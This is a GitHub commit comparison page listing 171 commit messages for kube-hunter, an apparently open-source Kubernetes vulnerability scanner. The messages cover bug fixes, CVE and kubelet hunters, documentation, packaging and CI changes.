Compare commits

..

171 Commits

Author SHA1 Message Date
danielsagi
812cbe6dc6 removed aquadev 2020-12-06 15:52:01 +02:00
danielsagi
85cec7a128 Added codeql analysis workflow 2020-12-06 15:47:05 +02:00
danielsagi
f95df8172b added a release workflow for a linux binary (#421) 2020-12-04 13:45:03 +02:00
danielsagi
a3ad928f29 Bug Fix: Pyinstaller prettytable error (#419)
* added specific problematic hooks folder for when compiling with pyinstaller. added a fix for prettytable import

* fixed typo

* lint fix
2020-12-04 13:43:37 +02:00
danielsagi
22d6676e08 Removed Travis and Greetings workflows (#415)
* removed greetings workflow, and travis

* Update the build status badge to point to Github Actions
2020-12-04 13:42:38 +02:00
danielsagi
b9e0ef30e8 Removed Old Dependency For CAP_NET_RAW (#416)
* removed old dependency for cap_net_raw, by stop usage of tracerouting when running as a pod

* removed unused imports
2020-12-03 17:11:18 +02:00
RDxR10
693d668d0a Update apiserver.py (#397)
* Update apiserver.py

Added description of KHV007

* fixed linting issues

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-28 19:41:06 +02:00
RDxR10
2e4684658f Update certificates.py (#398)
* Update certificates.py

Regex expression update for email

* fixed linting issues

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-28 18:55:14 +02:00
Hugo van Kemenade
f5e8b14818 Migrate tests to GitHub Actions (#395) (#399)
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-28 17:34:30 +02:00
danielsagi
05094a9415 Fix lint comments (#414)
* removed unused get query to port forward

* moved existing code to comments

Co-authored-by: Liz Rice <liz@lizrice.com>
2020-11-28 17:16:57 +02:00
danielsagi
8acedf2e7d updated screenshot of aqua's site (#412) 2020-11-27 16:04:38 +02:00
danielsagi
14ca1b8bce Fixed false positive on test_run_handler (#411)
* fixed wrong check on test run handler

* changed method of testing to be using 404 with real post method
2020-11-19 17:41:33 +02:00
danielsagi
5a578fd8ab More intuitive message when ProveSystemLogs fails (#409)
* fixed wrong message for when proving audit logs

* fixed linting
2020-11-18 11:35:13 +02:00
danielsagi
bf7023d01c Added docs for exposed pods (#407)
* added doc _kb for exposed pods

* correlated the new khv to the Exposed pods vulnerability

* fixed linting
2020-11-17 15:22:06 +02:00
danielsagi
d7168af7d5 Change KB links to avd (#406)
* changed link to point to avd

* changed kb_links to be on base report module. and updated to point to avd. now json output returns the full avd url to the vulnerability

* switched to adding a new avd_reference instead of changed the VID

* added newline to fix linting
2020-11-17 14:03:18 +02:00
Hugo van Kemenade
35873baa12 Upgrade syntax for supported Python versions (#394) (#401)
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-16 20:40:28 +02:00
Sinith
a476d9383f Update KHV005.md (#403) 2020-11-08 18:42:41 +02:00
Hugo van Kemenade
6a3c7a885a Support Python 3.9 (#393) (#400)
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-07 15:59:44 +02:00
A N U S H
b6be309651 Added Greeting Github Actions (#382)
* Added Greeting Github Actions

* feat: Updated the Message

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-07 15:16:14 +02:00
Monish Singh
0d5b3d57d3 added the link of contribution page (#383)
* added the link of contribution page

users can directly go to the contribution page from here after reading the readme file

* added it to the table of contents

* Done

sorry for my prev. mistake, now its fixed.

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-07 15:07:39 +02:00
Milind Chawre
69057acf9b Adding --log-file option (#329) (#387) 2020-11-07 15:01:30 +02:00
Itay Shakury
e63200139e fix azure spn hunter (#372)
* fix azure spn hunter

* fix issues

* restore tests

* code style

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-10-19 13:53:50 +03:00
Itay Shakury
ad4cfe1c11 update gitignore (#371)
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-10-19 13:03:46 +03:00
Zoltán Reegn
24b5a709ad Increase evidence field length in plain report (#385)
Given that the Description tends to go over 100 characters as well, it
seems appropriate to loosen the restriction of the evidence field.

Fixes #111

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-10-19 12:49:43 +03:00
Jeff Rescignano
9cadc0ee41 Optimize images (#389) 2020-10-19 12:27:22 +03:00
danielsagi
3950a1c2f2 Fixed bug in etcd hunting (#364)
* fixed etcd version hunting typo

* changed self.protocol in other places on etcd hunting. this is a typo, protocol is a property of events, not hunters

Co-authored-by: Daniel Sagi <daniel@example.com>
Co-authored-by: Liz Rice <liz@lizrice.com>
2020-09-04 13:28:03 +01:00
Sanka Sathyaji
7530e6fee3 Update job.yml for Kubernetes cluster jobs (#367)
Existing job.yml has wrong command for command ["python", "kube-hunter,py"]. But it should change to command ["kube-hunter"]

Co-authored-by: Liz Rice <liz@lizrice.com>
2020-09-04 12:15:24 +01:00
danielsagi
72ae8c0719 reformatted files to pass new linting (#369)
Co-authored-by: Daniel Sagi <daniel@example.com>
2020-09-04 12:01:16 +01:00
danielsagi
b341124c20 Fixed bug in certificate hunting (#365)
* striping was incorrect due to multiple newlines in certificate returned from ssl.get_server_certificate

* changed ' to " for linting

Co-authored-by: Daniel Sagi <daniel@example.com>
2020-09-03 15:06:51 +01:00
danielsagi
3e06647b4c Added multistage build for Dockerfile (#362)
* removed unnecessary files from final image, using multistaged build

* added ebtables and tcpdump packages to multistage

Co-authored-by: Daniel Sagi <daniel@example.com>
2020-08-21 14:42:02 +03:00
danielsagi
cd1f79a658 fixed typo (#363) 2020-08-14 19:09:06 +03:00
Liz Rice
2428e2e869 docs: fix broken CONTRIBUTING link (#361) 2020-07-03 11:59:53 +03:00
Abdullah Garcia
daf53cb484 Two new kubelet active hunters. (#344)
* Introducing active hunters:

- FootholdViaSecureKubeletPort
- MaliciousIntentViaSecureKubeletPort

* Format

Updating code according to expected linting format.

* Format

Updating code according to expected linting format.

* Format

Updating code according to expected linting format.

* Format

Updating code according to expected linting format.

* Testing

Update code according to expected testing standards and implementation.

* Update documentation.

- Added some more mitigations and updated the references list.

* f-string is missing placeholders.

- flake8 is marking this line as an issue as it lacks a placeholder when indicating the use of f-string; corrected.

* Update kubelet.py

- Add network_timeout parameter into requests.post and requests.get execution.

* Update kubelet.py

- Modified name of variable.

* Update kubelet.py and test_kubelet.py

- Remove certificate authority.

* Update kubelet.py and test_kubelet.py.

- Introducing default number of rm attempts.

* Update kubelet.py and test_kubelet.py.

- Introduced number of rmdir and umount attempts.

* Update kubelet.py

- Modified filename to match kube-hunter description.

* Update several files.

- Instated the use of self.event.session for GET and POST requests.
- Testing modified accordingly to complete coverage of changes and introduced methods.
- Requirements changed such that the required version that supports sessions mocking is obtained.

* Update kubelet.py

- Introduced warnings for the following commands in case of failure: rm, rmdir, and umount.

* Update kubelet.py

- Remove "self.__class__.__name___" from self.event.evidence.

* Update kubelet.py

- Remove unnecessary message section.

* Update files.

- Address class change.
- Fix testing failure after removing message section.

* Update kubelet.py

- Provide POD and CONTAINER as part of the warning messages in the log.

Co-authored-by: Abdullah Garcia <abdullah.garcia@jpmorgan.com>
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-06-29 09:20:49 +01:00
danielsagi
d6ca666447 Minor hunting bug fixes (#360)
* fixed f string

* fixed wrong iteration on list when getting random pod

* added '/' suffix to path on kubelet debug handlers tests

* also fixed minor bug in etcd, protocol was refrenced on the hunter and not on the event

* ran black format

* moved protocol to be https

* ran black again

* fixed PR comments

* ran black again, formatting
2020-06-26 15:04:29 +01:00
danielsagi
3ba926454a Added External Plugins Support (#357)
* added plugins submodule, created two hookspecs, one for adding arguments, one for running code after the argument parsing

* implemented plugins application on main file, changed mechanism for argument parsing

* changed previous parsing function to not create the ArgumentParser, and implemented it as a hook for the parsing mechanism

* added pluggy to required deps

* removed unecessary add_config import

* fixed formatting using black

* restored main link file from master

* moved import of parser to right before the register call, to avoid circular imports

* added tests for the plugins hooks

* removed blank line space

* black reformat
2020-06-19 15:20:15 +01:00
Konstantin Weddige
78e16729e0 Fix typo (#354)
This fixes #353
2020-06-08 13:47:40 +01:00
danielsagi
78c0133d9d removed an unnecessary f-string on an info logging (#355) 2020-06-08 15:04:29 +03:00
Liz Rice
4484ad734f Fix CertificateDiscovery hunter for Python3 (#350)
* update base64 decode for python3

* chore: remove lint error about imports
2020-05-11 10:42:31 +01:00
Yehuda Chikvashvili
a0127659b7 Decouple config and argument parsing (#342)
* Make config initialized explicitly
* Add mypy linting
* Make tests run individually
Resolve #341
2020-04-26 19:37:16 +03:00
Yehuda Chikvashvili
f034c8c7a1 Removed unused imports (#338)
* Update snippets in README.md
The README file had deprecated code snippets
* Remove unnecessary imports
* Complete tests for hunters registration

Resolves #334
2020-04-23 02:31:07 +03:00
mormamn
4cb2c8bad9 Dashboard hunter not working (#337)
* Fix dashboard hunter regression
Fix #336.
Add tests for dashboard hunter

Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-04-13 04:06:13 +03:00
Yehuda Chikvashvili
14d73e201e Remove dynamic imports (#335)
* Remove plugins
Current usage of plugins is not pluggable and includes logging
stuff.
Move this to conf/logging.
* Removed dynamic imports
* Add tests for hunters registration
2020-04-13 02:56:13 +03:00
John Schaeffer
6d63f55d18 Updated logging init logic to not log on setting --log=none (#323)
* Fix "none" logging

Test for different logging levels, existing and none existing

Co-authored-by: yoavrotems <yoavrotems97@gmail.com>
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-04-12 16:56:53 +03:00
mormamn
124a51d84f Support ignoring IPs (#332)
* Support ignoring IPs

Closes #296
2020-04-07 21:47:50 +03:00
Yehuda Chikvashvili
0f1739262f Linting Standards (#330)
Fix linting issues with flake8 and black.
Add pre-commit congifuration, update documnetation for it.
Apply linting check in Travis CI.
2020-04-05 05:22:24 +03:00
mormamn
9ddf3216ab Optimize Cloud Discovery (#325)
* Optimized Cloud Discovery
Removed redundant actions of getting cloud type.
Make cloud discovery a lazy action.
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-03-29 22:59:38 +03:00
Yehuda Chikvashvili
e7585f4ed3 Logging revamped (#318)
* Refine logging
Use logger objects instead of global root logger
Fixes #308 
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-03-04 21:03:36 +02:00
Yehuda Chikvashvili
6c34a62e39 Network operations timeout (#317)
* Add network operations timeout

This commit adds --network-timeout flag, which value will be used for
network operations timeout configurable, so demanding user
can set it to desired value.
2020-03-04 16:59:18 +02:00
blrchen
69a31f87e9 Fix #127 Insecure Azure Cloud IP detection (#315)
* Fix Insecure Azure Cloud IP detection
Remove verify=False

Co-authored-by: blairch <15134348+blairch@users.noreply.github.com>
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-03-03 01:10:16 +02:00
dependabot[bot]
f33c04bd5b Bump nokogiri from 1.10.4 to 1.10.8 in /docs (#311)
Bumps [nokogiri](https://github.com/sparklemotion/nokogiri) from 1.10.4 to 1.10.8.
- [Release notes](https://github.com/sparklemotion/nokogiri/releases)
- [Changelog](https://github.com/sparklemotion/nokogiri/blob/master/CHANGELOG.md)
- [Commits](https://github.com/sparklemotion/nokogiri/compare/v1.10.4...v1.10.8)

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: Liz Rice <liz@lizrice.com>
2020-03-02 15:23:39 +00:00
Yehuda Chikvashvili
11efbb7514 Fix Dockerfile build (#303)
* Fix Dockerfile build

The Docker build used a 2-step installation of requirements
and application.
This was broken by #272.

Fixes #300

* Add dependencies cache for docker build

Caching installation requirements saves time when building
2020-02-27 14:37:25 +02:00
mormamn
ac5dd40b74 Urllib3 upgrade (#314)
* Upgrade urllib3
resolves #307
2020-02-27 00:17:08 +02:00
mormamn
bf646f5e0c Fix broken reporting (#313)
Added instance creation of reporters and dispatcher objects
Fixes #312
2020-02-26 22:40:16 +02:00
mormamn
a8128b7ea0 Cleanup conf refactor (#310)
Reorganize config files, and argparse.
Resolves #289
Resolves #292
2020-02-25 12:29:18 +02:00
Yehuda Chikvashvili
e75c0ff37b Add PyInstaller build (#302)
* Add PyInstaller build

Use PyInstaller to generate single binary.
Use staticx to generate a single static binary.

Resolves #301

* Add test Makefile target

Add test to Makefile.
Add requests_mock to dev dependencies.
2020-02-18 17:31:10 +02:00
Liz Rice
fe187bc50a Correct KB link (#299) 2020-02-14 17:44:58 +00:00
Yehuda Chikvashvili
77227799a4 Add Makefile (#298)
Added Makefile with some helpful utils such as build, lint and clean
2020-02-12 17:32:28 +02:00
Vipul Gupta
df12d75d6d Packaging Kube-Hunter for PyPi (#272)
* Inital Commit

Signed-off-by: Vipul Gupta (@vipulgupta2048) <vipulgupta2048@gmail.com>

* Suggestions implemented as suggested

Signed-off-by: Vipul Gupta (@vipulgupta2048) <vipulgupta2048@gmail.com>

* Package with setuptools

Use setuptools to package kube-hunter as redistributable file.
Once packages, it can be pushed to PyPi.
The package version is taken from git tags (using setuptools_scm).

Closes #185

* Ignore __main__.py script in code coverage

The entrypoint script should not be tested but rather be calling
to tested modules.
Ideally, __main__ should only make a call to single function from
another tested module.

* Update requirements files

Use install_requires from setup.cfg file as single source of truth
for dependencies.
Install regular dependencies when installing dev dependencies.

* Symlink kube-hunter.py to entry point

Support the old way to run kube-hunter via the main script by making
a link to the new kube_hunter/__main__.py script.

Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-02-10 21:35:31 +02:00
Yehuda Chikvashvili
a4a8c71653 Fix empty report (#281)
* Fix empty report when active hunting

Running kube-hunter active hunting with plain report
did not show any report.
This commit changes Vulnerability.vid default value
to "None" (previously None)

Closes #280

* Improve debug and exception messages

Debugging hunters execution is hard due to lack of debug
information. No indication is made when a hunter starts.
Exceptions where printed without stack trace, which made
it difficult to follow.
2020-01-09 19:04:33 +02:00
Yehuda Chikvashvili
fe3dba90d8 Refactor configuration (#283)
* Remove __main__ references and create a top-level config module

* Move conf module into separate standalone package

* Deprecate install_imports.py script

* Rename root package to kube_hunter

The previous src root package name was too generic and not unique,
so it can be used as external name.
Change `src` to `kube_hunter` so it can be referenced in a clear way.
Addtional changes made on the way:
* Make imports absolute
* Formatting

Relates to #185

* remove todos

Co-authored-by: Ryan Lahfa <masterancpp@gmail.com>
Co-authored-by: Itay Shakury <itay@itaysk.com>
2019-12-29 14:18:58 +02:00
Oleg Butuzov
fd4d79a853 adding codecoverage (#198) 2019-11-30 08:45:33 +00:00
Liz Rice
3326171c7a docs: clarify that job.yaml is an example (#279) 2019-11-27 18:42:35 +02:00
Liz Rice
4c82b68f48 Merges #225 (#278)
* Fix typos

* Fix review comments
2019-11-26 21:11:33 +02:00
Yehuda Chikvashvili
1d7bdd6131 Consider patched versions as not vulnerable by default (#220)
* Consider patched versions as not vulnerable by default

Change `--ignore-downstream` to `--ignore-patched-versions` and
invert it's effect.
From now on, kube-hunter will not alert patched components as default
behavior.

Resolves #194

* Rename flag --ignore-patched-versions to --include-patched-versions
2019-11-26 20:28:30 +02:00
Itay Shakury
14c49922da mention KB in the readme (#276)
Co-Authored-By: Liz Rice <liz@lizrice.com>
2019-11-15 21:54:14 +02:00
Greg Jacobs
1c443eb6e4 Fixes for typos and readability in Readme.md and KB (#248) 2019-11-12 14:08:47 +02:00
Itay Shakury
12f5b75733 Refactor reporters and add KB URL to reports (#275)
* refactor reporters and add kburl

* rename json reporter file to align with other reporters
2019-11-10 15:21:36 +02:00
s-nirali
7b77945ebd Fix some linting issues (#267) 2019-11-08 13:07:37 +02:00
Ryan Lahfa
a266c9068f Locking: Use a RAII/Defensive style to prevent issues when exceptions are thrown (#269) 2019-11-07 19:10:37 +02:00
Anuj Singh
67af48fa9a Create a sitemap (#258) 2019-11-05 21:48:05 +02:00
Yehuda Chikvashvili
efd23433ff Support macOS (#273)
Upgrade scapy to version 2.4.3 and above.
This commit fixes IndexError that was raised when running
kube-hunter from macOS.

Resolves #262
2019-11-05 12:53:44 +02:00
Itay Shakury
8cc90db8f5 add kb index (#252) 2019-10-30 20:38:16 +02:00
Itay Shakury
0157ac83ce add .venv to gitignore (#256) 2019-10-28 23:40:16 +02:00
Rohith
031c4b9707 reponding to bug request https://github.com/aquasecurity/kube-hunter/issues/246 (#249)
/usr/bin/env python generally is defaulted to the version set by the linux flavour. On some distros it's python 2 and 3 on others, changing it to python3 might work
2019-10-26 19:05:13 +03:00
Raj Chowdhury
25333b201f Typo fix (#247)
Fixed Minor typos in README
2019-10-25 11:54:27 -07:00
Nithin-183
bde288ceb3 Update README.md (#237) 2019-10-25 11:42:10 -07:00
Arpit Pandey
f61f624d29 Fix typos in code comments (#227) 2019-10-23 19:10:01 +03:00
Ryan Lahfa
d424fcd7c8 Use set rather than list to test membership in O(1) (#231) 2019-10-23 18:34:19 +03:00
Itay Shakury
04fc39c810 build article titles from metadata (#238)
* rename id to vid to avoid conflict with jekyll's id

* build article title from metadata
2019-10-23 18:22:37 +03:00
Ramshah Jahangir
59543346d2 updating pul request template (#242)
* updating pul request template

* fixing typos
2019-10-23 18:12:43 +03:00
Itay Shakury
6b4f13e84a update ruby gems used for the kb website (#236) 2019-10-23 14:03:00 +03:00
michizhou
d8037434a0 Improved documentation (#201) 2019-10-23 11:16:49 +01:00
suijaa
a8428a9445 typo fix in KHV050.md 2019-10-22 09:03:07 +03:00
Sidhya Tikku
6969f02e9b Create PULL_REQUEST_TEMPLATE.md (#222) 2019-10-20 15:41:02 +03:00
Mislav Cimperšak
91e4388e53 adding multiple templates for github issues (#224) 2019-10-20 15:28:49 +03:00
Sidhya Tikku
c27bcb48de Update .gitignore (#221) 2019-10-19 15:00:25 +03:00
Soumyadeep Sinha
300fd117c9 Fixed Some typos (#199)
* Fixed some typos

* Fixed some typos
2019-10-18 18:55:47 +03:00
Manuel Rüger
195ce52111 .travis.yml: Simplify and extract dev reqs (#219)
With Xenial being default, the yaml can be simplified.

Also extract requirements for development, so users can install it easily.
2019-10-18 18:03:48 +03:00
SinithH
7f5d81e68e fixed some typos (#195)
* Update README.md

* Update README.md

* Update README.md

* Replace missing "if"

* Update README.md
2019-10-18 17:39:54 +03:00
Aayush Srivastava
6a80cdede5 Update README.md (#196)
* Update README.md

Added license details(and linked to the license page) and improved the readability of the README file.

* Update README.md

Co-Authored-By: Nikita Titov <nekit94-08@mail.ru>
2019-10-18 17:32:54 +03:00
Sumit Kharche
a877d86c13 Added license & docker image badge (#197)
* Added license badge in README.md

* Removed spaces at end of file.
2019-10-18 16:49:39 +03:00
Manuel Rüger
e145f8f4a4 Dockerfile: Use apk with --no-cache (#204)
Signed-off-by: Manuel Rüger <manuel@rueg.eu>
2019-10-18 16:32:16 +03:00
Steffin Stanly
3747b85552 Update README.md (#202) 2019-10-18 16:27:49 +03:00
Mohan Sha
4df3908772 Added table of contents for easier navigation (#211) 2019-10-18 15:58:54 +03:00
Itay Shakury
817070ea30 document api access vulnerabilities (#205)
* document apiinfodisclosure vuln

* fix relative url
2019-10-18 15:50:53 +03:00
Itay Shakury
b4029225dd document DNS spoofing vulnerability (#206)
* document dnsspoof vuln

* fix relative url
2019-10-18 15:40:39 +03:00
Manuel Rüger
1395389c62 kb: typo endoint -> endpoint (#214) 2019-10-18 15:32:34 +03:00
Itay Shakury
8602e2a603 fix navigation url when searching for kb article (#210)
* fix navigation url

* add baseurl
2019-10-18 15:16:20 +03:00
Itay Shakury
f67c437a36 document kubelet vulns (#209) 2019-10-16 18:28:34 +03:00
godaji
6ff4627f9b Rename camel var to snake style. (#182) 2019-10-15 08:51:35 +03:00
Itay Shakury
4e68ea4e15 Add Knowledge Base for reported vulnerabilities (#188) 2019-10-13 17:10:47 +03:00
SinithH
e982f291e9 fixed some typos (#193)
* Update README.md

* Update README.md

* Update README.md

* Replace missing "if"
2019-10-10 10:17:23 +01:00
Itay Shakury
3b13e5980f add contributing guide (#189) 2019-10-10 10:10:27 +01:00
Adam Hauze
bed2a1fe4a Updated README to include documentation around python venv (#187)
* Updated README to include documentation around python venv

* Tidy PR

Add link to Virtual Environments docs
Remove Mac-specific instruction about brew
Remove non-installation instructions from installation section

* Tidy PR

Remove run instruction from installation section
2019-10-04 13:09:25 +02:00
Yehuda Chikvashvili
bc00bbd058 Change CVE hunters description (#183)
Make CVE hunters description more accurate
2019-10-02 16:32:09 +02:00
Yehuda Chikvashvili
a1feb06ec7 Ignore downstream version flag (#181)
* Ignore downstream version flag

This commit adds `--ignore-downstream` flag to kube-hunter.
Enabling the flag will make kube-hunter considering patched versions
as not vulnerable.
Resolves #179

* Add test cases and refine argument description
2019-09-19 21:57:39 +03:00
Pierre-Yves Aillet
c4e1e1e48c removing the foot note (#178)
* removing the foot note

the underlying issue has been closed, so the foot note might be removed

* removing another note

spotted another note and reference to the issue in the README
2019-09-08 11:42:23 +03:00
danielsagi
e0bacd6e7b New Hunters: DNS spoofing & ARP spoofing (#159)
* added arp passive hunter

* seperated arp and dns hunters, made them active and fixed some coe on arp

* added description for hunters, and refactored description for vulnerabilities

* minor typo

* replaced google.com with 1.1.1.1

* fixed comments

* fixed scapy

* validated output of get_kube_dns_ip_mac
2019-08-29 19:08:53 +03:00
danielsagi
a015f259a0 added linkage of previously discovered protocol, on filter (#176) 2019-08-29 16:46:35 +03:00
Yehuda Chikvashvili
8bb8e1f16c Fix plain report with high log level (#175)
This commit fixes issue #108
Report type plain didn't work with log level higher than INFO.
2019-08-29 14:34:44 +03:00
danielsagi
427a295c8c Adding visibility for dispatching (#166)
* minor addition to description

* added documantation in readme

* minor changes to logging levels and formatting

* changed example in readme

* fixed merge

* added info logging to http dispatch method

* changed description from environ to environment variables
2019-08-28 12:18:58 +03:00
danielsagi
0315af75cf Detection for 3 new CVES (#173)
* changed version hunting to be on a a new version disclosure vulnerability

* fixed version publish

* added logging and fixed typo

* changed whole way of comparing versions in cve hunter

* changed K8sVersionDisclosure vulnerability to one core vulnerability, that takes an endpoint. changed all usage

* added tests

* merged kubectl cve hunting with apiserver hunting. and simplified the code of apiserver cve hunting

* fixed tests to new names

* changed name of module to cves.py

* drastically improved the cve vulnerble detection utility function. now works with all types of versioning methods

* added packaging in requirementes.txt

* added another test, and improved logic on cve comparison for more complicated versions

* changed CveHunter to subscribe_once, to prevent duplicates duplicates

* fixed tests for new improvements

* removed unnecessary ternary on doc

* removed unnecessary join split

* improved compare function, made it util

* improved cve checking to use mapping

* added detection for CVE-2019-9512 and  CVE-2019-9514

* added detection for CVE-2019-11247 and added minor comments
2019-08-27 22:03:29 +03:00
danielsagi
2dad27a175 Decrease vulnerabilities on build (#170)
* changed python version to 3.8.rc and removed wireshark from build. also added a plugin to supress scapy's warnings about the manuf

* changed to alpine 3.10, on docker file and removed unnecessary logging suppression

* changed to python 3.7

* changed base image on builder as well
2019-08-27 11:27:17 +01:00
danielsagi
860062abeb Added Metrics Server Discovery - Distinct from Api Server (#167)
* added basic metrics server discovery

* improved discovery, and added KNOWN PORTS usage

* improved apiserver decision

* fixed bug with comparison of IP addresses in kubeservicehost

* improved description of api server discovery

* added checks with auth_token on discovery

* fixed bug in version requests and added to tests

* added an abstract 'unrecognized API' event, and a filter for it for classification

* changed filtering to be done on the same event

* fixed verify on session and removed unnecessary enum

* minor changes to comments

* added detailed explanation
2019-08-27 08:54:08 +01:00
danielsagi
259f707ecd Refactor And Major Bug Fixes in Version and CVE hunting (#162)
* changed version hunting to be on a a new version disclosure vulnerability

* fixed version publish

* added logging and fixed typo

* changed whole way of comparing versions in cve hunter

* changed K8sVersionDisclosure vulnerability to one core vulnerability, that takes an endpoint. changed all usage

* added tests

* merged kubectl cve hunting with apiserver hunting. and simplified the code of apiserver cve hunting

* fixed tests to new names

* changed name of module to cves.py

* drastically improved the cve vulnerble detection utility function. now works with all types of versioning methods

* added packaging in requirementes.txt

* added another test, and improved logic on cve comparison for more complicated versions

* changed CveHunter to subscribe_once, to prevent duplicates duplicates

* fixed tests for new improvements

* removed unnecessary ternary on doc

* removed unnecessary join split

* improved compare function, made it util

* improved cve checking to use mapping
2019-08-27 08:48:47 +01:00
danielsagi
44e6438d37 Changed name of Subnet scanning to - Interface Scanning (#169)
* changed Subnet/internal scanning to interface

* Change one more internal -> interface
2019-08-25 20:40:30 +03:00
danielsagi
f5b72d44b5 New Core Feature: Subscribe Once (#168)
* added a subscribe_once decorator

* created tests for core functionality, for now, subscibe and subscribe once
2019-08-13 15:44:41 +01:00
Tom Davidson
e3af42cbce Separate report "sending" into modules (#156)
* moved report output into dispatchers, stdout by default with config option of http(s)

* notes in arg config on how to configure http dispatcher

* removed some debug log visibility indicators

* missing import

* env vars more descriptive: KUBEHUNTER_HTTP_DISPATCH_METHOD and KUBEHUNTER_HTTP_DISPATCH_URL

* optimisation: delayed instantiation of the dispatcher until after selection to avoid instantiating unnecessarily

* refactor: config selection as per reporter selection

* bugfix: fall-back to default required if unknown reporter or dispatcher specified

* swapping urllib3 for requests

* corrected visibility levels for logging

* moving dispatchers into a file in reporters rather than it's own place to fit with theme and support dynamic module loading
2019-08-12 13:28:31 +03:00
danielsagi
cb90673bcb Added API Server discovery when running as pod (#160)
* added an implementation for scanning api server from env variable, without duplications, when running as pod

* fixed issue with convertion of ip address
2019-08-05 13:25:06 -07:00
danielsagi
e5db8b6b28 New Hunter: /var/log mount (#158)
* added pods data on ExposedPodsHandler event, for later use

* added /var/log write mount hunter. in 'mounts' module. also an active hunter which exploits run handler as well

* removed unnecesary variables

* changed active hunter description

* minor changes to vulnerability descriptions
2019-08-01 20:17:57 +03:00
danielsagi
889a77d939 Pyinstaller/py2exe support (#157)
* removed unnecessary imports from main file

* added a script that generates static __init__ files based on existing modules

* added documentation

* added installing of plugins imports to script
2019-07-29 05:47:36 -07:00
danielsagi
91162297b3 Added System Logs Hunting & Improved Kubelet Hunting (#154)
* 1. added /logs Active hunter and tester.
2. changed kubelet handlers enum to be accessible as KubeletHandlers
3. added kubelet requests session to the event chain, for active hunters to use.

* added usage of event.session in the run active hunter
2019-07-10 14:57:25 +03:00
danielsagi
07db108511 Added pprof cmdline hunting (#150)
* added pprof/cmdline debug handler hunting on kubelet

* changed Name and Component of vuln

* removed preceding slash

* added verify=False
2019-07-10 11:37:26 +01:00
danielsagi
e4678843c9 Changed kubelet run handler test to be not a state changing operation (#136)
* changed kubelet run handler test to be not state-changing

* changed fake_container name to be more random

* changed run handler to GET and check for method not allowed
2019-07-10 11:29:15 +01:00
danielsagi
cc70c83ba4 Retire Support For Python 2 (#153)
* removed python2 from readme and travis

* changed except on caps hunter to except PermissionError, supports only from python3

* removed python2 support in main file

* changed cvehunter to use res.text in place of res.content (python3 returnes a bytes object for content)
2019-07-10 11:23:08 +01:00
danielsagi
911ec5eaf1 changed legacy host:port format to be 'location' in collector (#147) 2019-07-08 09:46:59 +01:00
danielsagi
5883e28971 Added new hunter for Capabilities (#146)
* added hunter for Capabilities, and a check for NET_RAW

* changed to Hunter from Discovery

* added description for hunter

* changed from PermissionError on net_raw check. for python2 support

* Clarify vulnerability description

Stating that this vulnerability only becomes a problem if a pod gets compromised
2019-07-04 12:39:41 +03:00
danielsagi
5185f28fff Added event filtering mechanism (#134)
* added event filtering mechanism, as well as a detailed explanation in src/README

* changed filter search to run only once for each event, also now returning None to indicate keeping of event

* expanded explanation of filtering in readme

* Tiny typo

* made changes for better readability, also filter should now return  None to indicate throwing of event

* changed apply filters loop to be simple and running on each publish.

* changed README

* added reassuring of parent event after filters

* moved event filtering to another function, now supporting trhoeing of event mid loop

* added note in README about event.previous

* Tiny text corrections

* More accurate comment

"Throwing an event" can actually mean triggering it (which is different from "throwing it _away_"). But I went for "discarded" here to be completely clear

* Remove superflous space that had crept in
2019-07-03 11:52:42 +01:00
Weston Steimel
0caecd60ed optimised docker image (#123)
* optimised docker image

* use multi-stage image to remove build dependencies from final layer
* updated to python 3.7.3

Signed-off-by: Weston Steimel <weston.steimel@gmail.com>

* add /etc/ethertypes in final layer

Added ebtables and copy /etc/ethertypes to disable warning in verions of
scapy with EtherCat functionality.  This also fixes misspelling of
tcpdump package in build layer.

Signed-off-by: Weston Steimel <weston.steimel@gmail.com>
2019-07-03 08:48:03 +01:00
danielsagi
049453ee15 changed run handler check to include all 4xx status codes (#142) 2019-06-27 09:55:56 +01:00
danielsagi
b2d2f5a01a New kubectl CVE hunter, detecting CVE-2019-11246 and CVE_2019_1002101 (#141)
* added a new hunter for CVE-2019-11246

* added KubectlClient component

* overriden location function on event to display a 'local machine' location

* added clarification about kubectl version --client operation

* Fix tiny typo

It reads better without the comma

* removed unnecessary debug message

* added CVE hunter for kubectl to allow more CVE checking.
2019-06-27 09:51:18 +01:00
danielsagi
f360c541ff Minor improve of task counting of queue (#139)
* changed way of task handler to be more safe. also added info about cases when one task is hanging

* removed queue_lock
2019-06-27 09:36:31 +01:00
Liz Rice
b5bf168938 Merge pull request #140 from danielsagi/show_vulnerabilities_without_services
Added printing vulnerabilities in case of no services on PlainReporter
2019-06-25 12:55:34 +01:00
Daniel Sagi
b7bcdd09cf better way of treating the printing, concatenating output 2019-06-24 22:42:03 +03:00
Daniel Sagi
1baca77754 Up until now if services were not discovered, vulnerabilities will not have shown. we want to show the, in any case. 2019-06-24 20:00:28 +03:00
Liz Rice
f9c001ddea Merge pull request #137 from aquasecurity/add_exception_messages
More detailed explanation about exceptions
2019-06-13 06:01:26 -07:00
Daniel Sagi
50ea9a2405 added more detailed explanation about exceptions in debug 2019-06-12 17:43:16 +03:00
danielsagi
e04e84cc16 Merge pull request #135 from aquasecurity/fix_get_random_pod
Fixed not finding open debug handlers
2019-06-11 18:11:12 +03:00
danielsagi
30121b5010 Merge branch 'master' into fix_get_random_pod 2019-06-11 17:53:13 +03:00
danielsagi
c338aae1d6 Merge pull request #117 from aquasecurity/insecure_port
Insecure port for api server
